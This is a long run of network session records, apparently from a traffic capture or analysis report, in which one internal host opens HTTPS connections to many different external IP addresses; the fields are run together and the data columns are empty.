                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10558192.168.2.1434866112.103.244.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10559192.168.2.145641018.145.0.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10560192.168.2.1454580220.9.23.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10561192.168.2.1434622156.2.178.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10562192.168.2.143295838.43.209.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10563192.168.2.1433020213.40.213.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10564192.168.2.1442204166.64.104.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10565192.168.2.145448467.44.217.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10566192.168.2.1436812203.83.97.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10567192.168.2.1453260132.33.17.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10568192.168.2.145734646.248.251.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10569192.168.2.1457246139.182.152.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10570192.168.2.1434796129.4.196.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10571192.168.2.1445820185.82.99.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10572192.168.2.1441162194.198.31.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10573192.168.2.144911019.32.218.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10574192.168.2.145340292.9.19.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10575192.168.2.1437126129.25.70.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10576192.168.2.1440392129.174.251.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10577192.168.2.144765059.22.22.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10578192.168.2.1447188188.84.123.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10579192.168.2.1444802133.215.18.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10580192.168.2.1459008210.52.173.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10581192.168.2.145156812.24.246.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10582192.168.2.1445618153.186.175.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10583192.168.2.1450170118.123.0.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10584192.168.2.144899850.36.12.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10585192.168.2.14356224.221.31.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10586192.168.2.143387897.16.174.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10587192.168.2.1454186160.133.2.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10588192.168.2.1442506148.92.221.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10589192.168.2.145481637.155.12.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10590192.168.2.1460182170.157.118.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10591192.168.2.1445386186.15.254.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10592192.168.2.145357614.11.43.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10593192.168.2.145837412.53.234.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10594192.168.2.1444910168.111.28.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10595192.168.2.1433282152.44.175.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10596192.168.2.1450716104.245.60.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10597192.168.2.145264291.127.84.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10598192.168.2.1437554171.109.96.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10599192.168.2.1444084168.211.55.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10600192.168.2.145103465.210.252.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10601192.168.2.145920241.225.208.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10602192.168.2.145001846.173.194.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10603192.168.2.1439152139.178.230.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10604192.168.2.1446982179.241.117.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10605192.168.2.145743462.254.46.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10606192.168.2.1457778197.92.95.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10607192.168.2.1446270158.245.101.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10608192.168.2.1457568134.11.44.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10609192.168.2.145091041.208.130.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10610192.168.2.145656040.91.175.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10611192.168.2.1438654112.19.32.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10612192.168.2.144022017.189.171.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10613192.168.2.145712845.104.216.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10614192.168.2.1437080188.221.53.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10615192.168.2.144357298.172.212.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10616192.168.2.1446002122.50.19.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10617192.168.2.1451878155.84.255.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10618192.168.2.1435694141.246.188.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10619192.168.2.1449832138.80.129.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10620192.168.2.1439190159.185.237.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10621192.168.2.1451178143.170.253.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10622192.168.2.1434524208.132.132.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10623192.168.2.144844432.8.5.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10624192.168.2.1440018176.214.85.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10625192.168.2.143747045.135.136.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10626192.168.2.144352220.57.170.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10627192.168.2.144867039.255.151.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10628192.168.2.1437502154.229.68.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10629192.168.2.145396248.4.245.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10630192.168.2.145389014.211.147.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10631192.168.2.1434514166.58.32.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10632192.168.2.144123424.25.50.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10633192.168.2.144434869.237.120.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10634192.168.2.1453874191.58.181.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10635192.168.2.1449796158.227.254.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10636192.168.2.143811645.58.152.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10637192.168.2.1432804196.202.17.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10638192.168.2.14353848.130.246.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10639192.168.2.144101041.92.21.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10640192.168.2.144735434.161.241.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10641192.168.2.145125070.248.2.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10642192.168.2.145094831.89.213.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10643192.168.2.145615424.89.212.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10644192.168.2.1447634151.162.81.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10645192.168.2.1450016165.234.221.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10646192.168.2.1443420176.253.103.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10647192.168.2.1446878136.124.230.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10648192.168.2.1435820102.109.144.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10649192.168.2.1455568162.147.128.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10650192.168.2.146098032.126.167.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10651192.168.2.144185854.96.37.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10652192.168.2.1445694189.105.133.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10653192.168.2.144568298.82.147.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10654192.168.2.1432790151.231.195.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10655192.168.2.14446165.16.230.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10656192.168.2.1440664153.248.173.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10657192.168.2.143422058.104.14.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10658192.168.2.1434404181.40.190.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10659192.168.2.145136412.221.120.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10660192.168.2.143558048.108.234.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10661192.168.2.145946824.111.71.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10662192.168.2.1435940129.78.46.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10663192.168.2.1447498166.219.55.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10664192.168.2.1437020195.210.26.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10665192.168.2.1455550115.180.112.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10666192.168.2.1457840196.174.90.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10667192.168.2.1454276150.195.2.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10668192.168.2.145237475.52.91.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10669192.168.2.1436606189.43.149.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10670192.168.2.1442660184.82.50.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10671192.168.2.1436488100.188.75.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10672192.168.2.145650232.210.135.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10673192.168.2.1460536135.139.38.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10674192.168.2.1432984163.11.50.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10675192.168.2.143442053.96.235.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10676192.168.2.1453930137.43.44.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10677192.168.2.1449108213.132.154.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10678192.168.2.1450352181.165.128.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10679192.168.2.14535761.218.217.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10680192.168.2.143577099.42.7.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10681192.168.2.1435194141.33.147.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10682192.168.2.1459062201.115.162.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10683192.168.2.1458256212.77.43.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10684192.168.2.143515253.220.26.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10685192.168.2.1443082111.246.99.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10686192.168.2.144425074.136.172.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10687192.168.2.143718892.93.122.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10688192.168.2.1445722106.173.102.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10689192.168.2.1437546195.175.122.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10690192.168.2.1443482157.79.93.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10691192.168.2.1451508156.98.14.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10692192.168.2.144342898.17.90.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10693192.168.2.1447066184.213.146.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10694192.168.2.1443178132.11.85.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10695192.168.2.1449020146.219.81.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10696192.168.2.1438462137.104.52.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10697192.168.2.143341470.185.23.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10698192.168.2.1449070195.190.230.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10699192.168.2.1447066118.17.176.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10700192.168.2.14465664.89.160.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10701192.168.2.145042435.127.236.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10702192.168.2.1460470125.18.144.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10703192.168.2.1448474183.228.187.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10704192.168.2.1437614185.6.112.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10705192.168.2.1434442175.221.220.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10706192.168.2.1451424108.237.88.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10707192.168.2.143719057.111.150.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10708192.168.2.1447666125.45.21.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10709192.168.2.1444998102.245.180.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10710192.168.2.1460788200.18.194.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10711192.168.2.1442064115.186.158.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10712192.168.2.1448916134.128.106.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10713192.168.2.1444436185.89.100.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10714192.168.2.1455004209.176.235.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10715192.168.2.1433344184.234.78.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10716192.168.2.1448100196.187.159.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10717192.168.2.1439226143.53.179.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10718192.168.2.1443938168.19.33.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10719192.168.2.1447488200.12.86.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10720192.168.2.1448746168.73.47.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10721192.168.2.1460206218.153.182.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10722192.168.2.145125827.170.22.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10723192.168.2.1438122190.107.246.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10724192.168.2.1454140198.155.226.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10725192.168.2.144854676.21.114.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10726192.168.2.143667639.158.200.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10727192.168.2.1436832125.108.162.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10728192.168.2.1432838217.57.24.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10729192.168.2.144171863.68.39.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10730192.168.2.1458500162.112.176.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10731192.168.2.145160076.189.99.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10732192.168.2.1451592155.170.85.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10733192.168.2.144036898.80.132.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10734192.168.2.1439654177.181.238.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10735192.168.2.1456842203.251.59.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10736192.168.2.144007279.16.62.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10737192.168.2.1447166101.162.164.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10738192.168.2.1435406216.160.41.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10739192.168.2.1450066113.170.138.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10740192.168.2.1452752154.156.84.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10741192.168.2.144964253.94.8.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10742192.168.2.143848871.39.228.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10743192.168.2.1444652118.124.147.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10744192.168.2.145847674.69.59.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10745192.168.2.144367884.48.184.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10746192.168.2.143278870.245.244.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10747192.168.2.144891461.95.101.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10748192.168.2.145551414.16.78.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10749192.168.2.1440874200.43.51.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10750192.168.2.145813890.231.8.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10751192.168.2.143914859.66.208.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10752192.168.2.1447584169.174.177.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10753192.168.2.145938260.153.117.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10754192.168.2.145978449.189.74.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10755192.168.2.144841031.244.47.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10756192.168.2.145502073.73.34.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10757192.168.2.144046620.37.232.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10758192.168.2.1449932223.51.50.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10759192.168.2.143860414.222.137.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10760192.168.2.143913682.65.216.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10761192.168.2.1436256101.24.109.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10762192.168.2.1441866103.54.170.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10763192.168.2.144170697.130.150.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10764192.168.2.1437070119.42.48.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10765192.168.2.1455524175.135.66.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10766192.168.2.1449444192.94.133.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10767192.168.2.1437442109.14.37.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10768192.168.2.1449006176.43.107.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10769192.168.2.144404824.134.188.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10770192.168.2.1453402153.25.199.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10771192.168.2.144683224.111.206.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10772192.168.2.1442410181.57.212.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10773192.168.2.1451884217.123.238.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10774192.168.2.1445090219.53.127.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10775192.168.2.145973269.158.236.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10776192.168.2.1453180108.0.137.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10777192.168.2.1458266223.172.8.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10778192.168.2.1435298140.58.21.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10779192.168.2.1457360194.35.158.146443
